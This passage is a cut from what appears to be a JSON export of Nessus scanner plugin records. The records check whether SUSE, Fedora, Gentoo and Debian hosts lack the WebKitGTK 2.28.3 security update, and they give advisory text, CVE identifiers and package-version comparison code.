(ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libjavascriptcoregtk-4_0-18-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwebkit2gtk-4_0-37-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwebkit2gtk3-lang-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"typelib-1_0-WebKit2-4_0-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit-jsc-4-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit-jsc-4-debuginfo-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk-4_0-injected-bundles-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk3-debugsource-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk3-devel-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk3-minibrowser-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk3-minibrowser-debuginfo-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.28.3-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.28.3-lp151.2.21.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-28T14:30:57", "description": "Update to 2.28.3 :\n\n - Fix kinetic scrolling with async scrolling.\n\n - Fix web process hangs on large GitHub pages.\n\n - Bubblewrap sandbox should not attempt to bind empty paths.\n\n - Fix threading issues in the media player.\n\n - Fix several crashes and rendering issues.\n\n - Security fixes: CVE-2020-9802, CVE-2020-9803, CVE-2020-9805, CVE-2020-9806, CVE-2020-9807, CVE-2020-9843, CVE-2020-9850, CVE-2020-13753\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-07-14T00:00:00", "type": "nessus", "title": "Fedora 32 : webkit2gtk3 (2020-ab074c6cdf)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2022-05-13T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkit2gtk3", "cpe:/o:fedoraproject:fedora:32"], "id": "FEDORA_2020-AB074C6CDF.NASL", "href": "https://www.tenable.com/plugins/nessus/138408", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-ab074c6cdf.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138408);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\"CVE-2020-13753\", \"CVE-2020-9802\", \"CVE-2020-9803\", \"CVE-2020-9805\", \"CVE-2020-9806\", \"CVE-2020-9807\", \"CVE-2020-9843\", \"CVE-2020-9850\");\n script_xref(name:\"FEDORA\", value:\"2020-ab074c6cdf\");\n\n script_name(english:\"Fedora 32 : webkit2gtk3 (2020-ab074c6cdf)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 2.28.3 :\n\n - Fix kinetic scrolling with async scrolling.\n\n - Fix web process hangs on large GitHub pages.\n\n - Bubblewrap sandbox should not attempt to bind empty\n paths.\n\n - Fix threading issues in the media player.\n\n - Fix several crashes and rendering issues.\n\n - Security fixes: CVE-2020-9802, CVE-2020-9803,\n CVE-2020-9805, CVE-2020-9806, CVE-2020-9807,\n CVE-2020-9843, CVE-2020-9850, CVE-2020-13753\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-ab074c6cdf\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected webkit2gtk3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9850\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari in Operator Side Effect Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"webkit2gtk3-2.28.3-1.fc32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-27T14:17:04", "description": "The remote host is affected by the vulnerability described in GLSA-202007-11 (WebKitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2020-07-27T00:00:00", "type": "nessus", "title": "GLSA-202007-11 : WebKitGTK+: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2022-05-13T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202007-11.NASL", "href": "https://www.tenable.com/plugins/nessus/138934", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202007-11.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138934);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\"CVE-2020-13753\", \"CVE-2020-9802\", \"CVE-2020-9803\", \"CVE-2020-9805\", \"CVE-2020-9806\", \"CVE-2020-9807\", \"CVE-2020-9843\", \"CVE-2020-9850\");\n script_xref(name:\"GLSA\", value:\"202007-11\");\n\n script_name(english:\"GLSA-202007-11 : WebKitGTK+: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202007-11\n(WebKitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202007-11\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All WebKitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.28.3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9850\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari in Operator Side Effect Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 2.28.3\"), vulnerable:make_list(\"lt 2.28.3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebKitGTK+\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-28T14:30:23", "description": "Update to 2.28.3 :\n\n - Fix kinetic scrolling with async scrolling.\n\n - Fix web process hangs on large GitHub pages.\n\n - Bubblewrap sandbox should not attempt to bind empty paths.\n\n - Fix threading issues in the media player.\n\n - Fix several crashes and rendering issues.\n\n - Security fixes: CVE-2020-9802, CVE-2020-9803, CVE-2020-9805, CVE-2020-9806, CVE-2020-9807, CVE-2020-9843, CVE-2020-9850, CVE-2020-13753\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-07-20T00:00:00", "type": "nessus", "title": "Fedora 31 : webkit2gtk3 (2020-d2736ee493)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2022-05-13T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkit2gtk3", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2020-D2736EE493.NASL", "href": "https://www.tenable.com/plugins/nessus/138655", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-d2736ee493.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138655);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\"CVE-2020-13753\", \"CVE-2020-9802\", \"CVE-2020-9803\", \"CVE-2020-9805\", \"CVE-2020-9806\", \"CVE-2020-9807\", \"CVE-2020-9843\", \"CVE-2020-9850\");\n script_xref(name:\"FEDORA\", value:\"2020-d2736ee493\");\n\n script_name(english:\"Fedora 31 : webkit2gtk3 (2020-d2736ee493)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 2.28.3 :\n\n - Fix kinetic scrolling with async scrolling.\n\n - Fix web process hangs on large GitHub pages.\n\n - Bubblewrap sandbox should not attempt to bind empty\n paths.\n\n - Fix threading issues in the media player.\n\n - Fix several crashes and rendering issues.\n\n - Security fixes: CVE-2020-9802, CVE-2020-9803,\n CVE-2020-9805, CVE-2020-9806, CVE-2020-9807,\n CVE-2020-9843, CVE-2020-9850, CVE-2020-13753\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-d2736ee493\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected webkit2gtk3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9850\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari in Operator Side Effect Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"webkit2gtk3-2.28.3-1.fc31\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-27T14:16:26", "description": "The following vulnerabilities have been discovered in the webkit2gtk web engine :\n\n - CVE-2020-9802 Samuel Gross discovered that processing maliciously crafted web content may lead to arbitrary code execution.\n\n - CVE-2020-9803 Wen Xu discovered that processing maliciously crafted web content may lead to arbitrary code execution.\n\n - CVE-2020-9805 An anonymous researcher discovered that processing maliciously crafted web content may lead to universal cross site scripting.\n\n - CVE-2020-9806 Wen Xu discovered that processing maliciously crafted web content may lead to arbitrary code execution.\n\n - CVE-2020-9807 Wen Xu discovered that processing maliciously crafted web content may lead to arbitrary code execution.\n\n - CVE-2020-9843 Ryan Pickren discovered that processing maliciously crafted web content may lead to a cross site scripting attack.\n\n - CVE-2020-9850 @jinmo123, @setuid0x0_, and @insu_yun_en discovered that a remote attacker may be able to cause arbitrary code execution.\n\n - CVE-2020-13753 Milan Crha discovered that an attacker may be able to execute commands outside the bubblewrap sandbox.", "cvss3": {}, "published": "2020-07-20T00:00:00", "type": "nessus", "title": "Debian DSA-4724-1 : webkit2gtk - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2022-05-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:webkit2gtk", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4724.NASL", "href": "https://www.tenable.com/plugins/nessus/138644", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4724. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138644);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\"CVE-2020-13753\", \"CVE-2020-9802\", \"CVE-2020-9803\", \"CVE-2020-9805\", \"CVE-2020-9806\", \"CVE-2020-9807\", \"CVE-2020-9843\", \"CVE-2020-9850\");\n script_xref(name:\"DSA\", value:\"4724\");\n\n script_name(english:\"Debian DSA-4724-1 : webkit2gtk - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The following vulnerabilities have been discovered in the webkit2gtk\nweb engine :\n\n - CVE-2020-9802\n Samuel Gross discovered that processing maliciously\n crafted web content may lead to arbitrary code\n execution.\n\n - CVE-2020-9803\n Wen Xu discovered that processing maliciously crafted\n web content may lead to arbitrary code execution.\n\n - CVE-2020-9805\n An anonymous researcher discovered that processing\n maliciously crafted web content may lead to universal\n cross site scripting.\n\n - CVE-2020-9806\n Wen Xu discovered that processing maliciously crafted\n web content may lead to arbitrary code execution.\n\n - CVE-2020-9807\n Wen Xu discovered that processing maliciously crafted\n web content may lead to arbitrary code execution.\n\n - CVE-2020-9843\n Ryan Pickren discovered that processing maliciously\n crafted web content may lead to a cross site scripting\n attack.\n\n - CVE-2020-9850\n @jinmo123, @setuid0x0_, and @insu_yun_en discovered that\n a remote attacker may be able to cause arbitrary code\n execution.\n\n - CVE-2020-13753\n Milan Crha discovered that an attacker may be able to\n execute commands outside the bubblewrap sandbox.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-9802\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-9803\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-9805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-9806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-9807\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-9843\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-9850\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-13753\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/webkit2gtk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/webkit2gtk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4724\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the webkit2gtk packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 2.28.3-2~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9850\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari in Operator Side Effect Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:webkit2gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"gir1.2-javascriptcoregtk-4.0\", reference:\"2.28.3-2~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"gir1.2-webkit2-4.0\", reference:\"2.28.3-2~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libjavascriptcoregtk-4.0-18\", reference:\"2.28.3-2~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libjavascriptcoregtk-4.0-bin\", reference:\"2.28.3-2~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libjavascriptcoregtk-4.0-dev\", reference:\"2.28.3-2~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", 